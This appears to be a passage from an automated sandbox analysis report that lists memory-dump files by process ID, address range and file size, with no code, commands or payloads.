          520KB

        • memory/1360-69-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-70-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-68-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-25-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-67-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-65-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-31-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-66-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-34-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-35-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-36-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-37-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-38-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-39-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-40-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-64-0x0000000000400000-0x0000000000482000-memory.dmp

          Filesize

          520KB

        • memory/1360-63-0x0000000010000000-0x0000000010019000-memory.dmp

          Filesize

          100KB

        • memory/1360-62-0x0000000010000000-0x0000000010019000-memory.dmp

          Filesize

          100KB

        • memory/1360-59-0x0000000010000000-0x0000000010019000-memory.dmp

          Filesize

          100KB

        • memory/2188-24-0x00000125A88F0000-0x00000125A8AFC000-memory.dmp

          Filesize

          2.0MB

        • memory/2392-53-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/2392-52-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/2392-45-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/2448-23-0x00007FFDAEC60000-0x00007FFDAF721000-memory.dmp

          Filesize

          10.8MB

        • memory/2448-12-0x00007FFDAEC60000-0x00007FFDAF721000-memory.dmp

          Filesize

          10.8MB

        • memory/2448-22-0x00007FFDAEC63000-0x00007FFDAEC65000-memory.dmp

          Filesize

          8KB

        • memory/2448-1-0x00000216CBC80000-0x00000216CBCA2000-memory.dmp

          Filesize

          136KB

        • memory/2448-11-0x00007FFDAEC60000-0x00007FFDAF721000-memory.dmp

          Filesize

          10.8MB

        • memory/2448-0-0x00007FFDAEC63000-0x00007FFDAEC65000-memory.dmp

          Filesize

          8KB

        • memory/2448-32-0x00007FFDAEC60000-0x00007FFDAF721000-memory.dmp

          Filesize

          10.8MB

        • memory/2940-51-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/2940-49-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/2940-44-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/4140-43-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/4140-48-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/4140-50-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/4140-46-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB